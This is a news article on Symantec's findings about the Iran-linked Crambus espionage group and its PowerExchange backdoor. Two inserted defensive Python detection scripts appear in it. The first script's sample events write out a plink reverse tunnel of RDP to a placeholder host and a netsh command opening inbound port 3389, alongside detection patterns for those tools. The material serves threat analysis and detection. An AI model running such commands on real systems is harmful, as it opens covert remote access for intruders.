Crambus cyber espionage group exploits PowerShell backdoor to target Middle Eastern government

Symantec researchers have exposed the operations of the Crambus espionage group (also known as OilRig and APT34), which focused on infiltrating a Middle Eastern government. The attackers, believed to be linked to Iran, compromised numerous computers and servers over the course of eight months, between February and September 2023.

“During the compromise, the attackers stole files and passwords and, in one case, installed a PowerShell backdoor (dubbed PowerExchange) that was used to monitor incoming mails sent from an Exchange Server in order to execute commands sent by the attackers in the form of emails, and surreptitiously forwarded results to the attackers,” the Symantec Threat Hunter Team wrote in a blog post last week. “Malicious activity occurred on at least 12 computers and there is evidence that the attackers deployed backdoors and keyloggers on dozens more.”

In addition to deploying malware, “the attackers made frequent use of the publicly available network administration tool Plink to configure port-forwarding rules on compromised machines, enabling remote access via the Remote Desktop Protocol (RDP). There is also evidence the attackers modified Windows firewall rules in order to enable remote access,” the post added.
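The Plink port-forwarding and firewall-rule changes described above leave traces in process-creation telemetry. The following added example (not code from Symantec or the article) shows how a defender might triage such records: it flags Plink invocations that set up a tunnel involving the RDP port and netsh commands that add an inbound allow rule for TCP/3389, then correlates both per host. The event records, host names, user names and the 203.0.113.10 address are constructed placeholders, not telemetry from the reported intrusion.

```python
"""Triage constructed process-creation events for the living-off-the-land
pattern described above: Plink tunnels exposing RDP and netsh firewall rule
changes that open inbound TCP/3389.  Added example, not Symantec's code."""

RDP_PORT = "3389"
# PuTTY plink switches that set up local (-L), remote (-R) or dynamic (-D) forwarding
PLINK_FORWARD_FLAGS = {"-L", "-R", "-D"}

# Constructed sample events in the shape an EDR or Sysmon "process create" record
# would give (host, user, command line).  Not data from the reported intrusion;
# 203.0.113.10 is a documentation-range address used as a placeholder.
SAMPLE_EVENTS = [
    {"host": "srv-01", "user": "svc_backup",
     "cmd": "C:\\Users\\Public\\plink.exe -N -R 3389:127.0.0.1:3389 -pw ******** ops@203.0.113.10"},
    {"host": "srv-01", "user": "svc_backup",
     "cmd": 'netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389'},
    {"host": "ws-07", "user": "jdoe",
     "cmd": "C:\\Tools\\plink.exe -ssh admin@build.example.internal"},
    {"host": "ws-07", "user": "jdoe",
     "cmd": "notepad.exe C:\\Users\\jdoe\\notes.txt"},
]


def _image_name(token):
    """Lower-cased file name of an executable token, whatever the path style."""
    return token.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyse_plink(tokens):
    """Reasons to look at a plink command; None when the command is not plink."""
    if _image_name(tokens[0]) not in ("plink", "plink.exe"):
        return None
    reasons = []
    for i, tok in enumerate(tokens):
        if tok in PLINK_FORWARD_FLAGS and i + 1 < len(tokens):
            spec = tokens[i + 1]            # e.g. 3389:127.0.0.1:3389
            if RDP_PORT in spec.split(":"):
                reasons.append(f"plink {tok} tunnel involving TCP/{RDP_PORT}")
            else:
                reasons.append(f"plink {tok} tunnel {spec}")
    if "-pw" in tokens:
        reasons.append("plink password supplied on the command line")
    return reasons


def analyse_netsh(tokens):
    """Reasons if netsh adds or changes a firewall rule allowing inbound RDP;
    None when the command is not netsh."""
    if _image_name(tokens[0]) not in ("netsh", "netsh.exe"):
        return None
    low = [t.lower() for t in tokens]
    if "advfirewall" not in low or "firewall" not in low:
        return []
    if not ({"add", "set"} & set(low)):
        return []
    opens_rdp = (f"localport={RDP_PORT}" in low
                 and "action=allow" in low and "dir=in" in low)
    return [f"firewall rule allowing inbound TCP/{RDP_PORT}"] if opens_rdp else []


def triage(events):
    """Return one alert per event that matches either detector."""
    alerts = []
    for ev in events:
        # Whitespace split is enough for these checks; quoted arguments containing
        # spaces are not rejoined, so use the parsed command-line fields in production.
        tokens = ev["cmd"].split()
        if not tokens:
            continue
        reasons = analyse_plink(tokens)
        if reasons is None:
            reasons = analyse_netsh(tokens)
        if reasons:
            alerts.append({"host": ev["host"], "user": ev["user"], "reasons": reasons})
    return alerts


def correlate(alerts):
    """Per host: 'high' when both a tunnel and a firewall change were seen, else 'medium'."""
    seen = {}
    for a in alerts:
        kinds = seen.setdefault(a["host"], set())
        for r in a["reasons"]:
            kinds.add("tunnel" if r.startswith("plink") else "firewall")
    return {h: ("high" if {"tunnel", "firewall"} <= k else "medium") for h, k in seen.items()}


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for alert in found:
        print(alert)
    print(correlate(found))
```

On the constructed sample, only srv-01 is reported, and it is rated high because the same host shows both a reverse tunnel on the RDP port and a firewall rule opening that port. A legitimate Plink session without forwarding switches (ws-07) produces no alert, which is the point of keying on the tunnelling flags rather than on the binary name alone.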

Back in February this year, Trend Micro researchers published an analysis of an APT34 malware infection campaign, observed in December 2022, that targeted organizations in the Middle East for cyberespionage. Using the backdoor malware, the campaign abused legitimate but compromised email accounts to send stolen data to external mail accounts controlled by the attackers. APT34 malware has been documented targeting organizations worldwide, particularly companies in the financial, government, energy, chemical, and telecommunications sectors in the Middle East, since at least 2014.

Crambus, a long-running Iranian espionage group, has carried out high-impact operations across several countries, with targets in Saudi Arabia, Israel, the United Arab Emirates, and beyond, Symantec detailed. Known for intrusion campaigns focused on intelligence gathering, Crambus has more recently added a sophisticated social engineering element to its attacks.

Crambus drew wide attention for its role in a major attack on the Albanian government, disclosed by Microsoft last year, in which the group penetrated networks, extracted sensitive data, and may have deployed destructive wipers, cementing its status as a formidable cyber espionage actor.

During the latest attack, Symantec detailed that Crambus deployed three previously undiscovered pieces of malware, along with the PowerExchange backdoor, a known backdoor that hadn’t yet been attributed to Crambus. In addition to malware, the attackers made use of a number of living-off-the-land and legitimate tools.

Backdoor.Tokel has the ability to execute arbitrary PowerShell commands and download files. The command and control (C&C) address is stored in a separate, RC4-encrypted file called token.bin, which is saved in the working directory. Trojan.Dirps is used to enumerate all files in a directory and execute PowerShell commands; Infostealer.Clipog is an information-stealing malware that is capable of copying clipboard data, capturing keystrokes, and logging the processes in which keystrokes are entered.

The researchers also detailed Backdoor.PowerExchange, a PowerShell-based malware that can log into an Exchange Server with hardcoded credentials and monitor for emails sent by the attackers. “It uses an Exchange Server as a C&C. Mails received with ‘@@’ in the subject contain commands sent from the attackers which allows them to execute arbitrary PowerShell commands, write files, and steal files. The malware creates an Exchange rule (called ‘defaultexchangerules’) to filter these messages and move them to the Deleted Items folder automatically,” they added.
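The two indicators Symantec reports for PowerExchange, the ‘@@’ subject marker and the ‘defaultexchangerules’ mailbox rule that auto-moves those messages to Deleted Items, can be hunted for in exported mailbox data. The following added example (not code from Symantec or the article) does this over constructed records in the shape of an exported inbox-rule listing and a message index; on a live Exchange environment the rules would come from Get-InboxRule, but Python over exported data is used here so the check runs offline. The mailbox names, rule records and messages are constructed, and the folder list used to judge “hiding” rules is an assumption of this example, not something the report specifies.

```python
"""Hunt for PowerExchange-style mailbox indicators in exported mailbox data.
Added example, not Symantec's code.  Rule and message records are constructed."""

KNOWN_RULE_NAMES = {"defaultexchangerules"}   # rule name reported by Symantec
COMMAND_MARKER = "@@"                          # subject marker reported for attacker commands
# Folders where a rule can park mail so the mailbox owner never sees it (assumption)
HIDING_FOLDERS = {"deleted items", "junk email", "rss feeds", "conversation history"}

# Constructed records in the shape of an exported inbox-rule listing
# (name / subject words / target folder / enabled).  Not data from the intrusion.
SAMPLE_RULES = [
    {"mailbox": "finance@corp.example", "name": "Newsletter filing",
     "subject_contains": ["newsletter"], "move_to": "Inbox\\Newsletters", "enabled": True},
    {"mailbox": "it-ops@corp.example", "name": "defaultexchangerules",
     "subject_contains": ["@@"], "move_to": "Deleted Items", "enabled": True},
    {"mailbox": "hr@corp.example", "name": "old vendor",
     "subject_contains": ["@@"], "move_to": "Deleted Items", "enabled": False},
]

# Constructed message index entries (mailbox, sender, subject, current folder).
SAMPLE_MESSAGES = [
    {"mailbox": "it-ops@corp.example", "from": "partner@mail.example",
     "subject": "@@ status", "folder": "Deleted Items"},
    {"mailbox": "it-ops@corp.example", "from": "partner@mail.example",
     "subject": "@@ ls", "folder": "Deleted Items"},
    {"mailbox": "finance@corp.example", "from": "vendor@mail.example",
     "subject": "Invoice 4471", "folder": "Inbox"},
]


def suspicious_rules(rules):
    """Return enabled rules with one or more PowerExchange-like traits.

    'escalate' is set when at least two traits coincide, since a rule that merely
    deletes mail, or merely has an odd name, is common in normal mailboxes."""
    findings = []
    for r in rules:
        if not r["enabled"]:
            continue
        reasons = []
        if r["name"].lower() in KNOWN_RULE_NAMES:
            reasons.append("rule name matches PowerExchange indicator")
        if r["move_to"].lower() in HIDING_FOLDERS:
            reasons.append(f"moves matching mail to '{r['move_to']}' unread")
        if any(COMMAND_MARKER in w for w in r["subject_contains"]):
            reasons.append(f"filters on subject marker '{COMMAND_MARKER}'")
        if reasons:
            findings.append({"mailbox": r["mailbox"], "rule": r["name"],
                             "reasons": reasons, "escalate": len(reasons) >= 2})
    return findings


def command_channel_messages(messages):
    """Messages carrying the command marker, grouped by mailbox, with a flag
    showing whether each one was parked in a hiding folder."""
    hits = {}
    for m in messages:
        if COMMAND_MARKER in m["subject"]:
            hits.setdefault(m["mailbox"], []).append(
                {"from": m["from"], "hidden": m["folder"].lower() in HIDING_FOLDERS})
    return hits


def report(rules, messages):
    """Mailboxes where a suspicious rule and marker messages coincide."""
    rule_hits = {f["mailbox"] for f in suspicious_rules(rules) if f["escalate"]}
    msg_hits = command_channel_messages(messages)
    return sorted(rule_hits & set(msg_hits))


if __name__ == "__main__":
    for f in suspicious_rules(SAMPLE_RULES):
        print(f)
    print(command_channel_messages(SAMPLE_MESSAGES))
    print("mailboxes to investigate:", report(SAMPLE_RULES, SAMPLE_MESSAGES))
```

On the constructed data only it-ops@corp.example is reported: its rule matches all three traits, and two marker-bearing messages from the same external sender were auto-moved to Deleted Items, which is exactly the pattern the report describes. The disabled rule on the hr mailbox is skipped, and the finance newsletter rule produces no finding.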

Additionally, the post identified Mimikatz, a publicly available credential dumping tool, and Plink, a command-line connection tool from the PuTTY SSH toolset, as being used by the Crambus espionage group.

In its conclusion, Symantec identifies Crambus as a long-running and experienced espionage group with extensive expertise in carrying out long campaigns against targets of interest to Iran. “After a 2019 leak of its toolset, there was some speculation that Crambus may disappear. However, its activities over the past two years demonstrate that it represents a continuing threat for organizations in the Middle East and further afield,” it added.

Earlier this month, Symantec researchers revealed the presence of Grayling, a previously unknown advanced persistent threat (APT) group that used custom malware and multiple publicly available tools. The group targeted several organizations in the manufacturing, IT, and biomedical sectors in Taiwan. A government agency in the Pacific Islands, as well as organizations in Vietnam and the U.S., also appear to have been hit as part of this campaign. Symantec found that the activity began in February this year and continued until at least May.
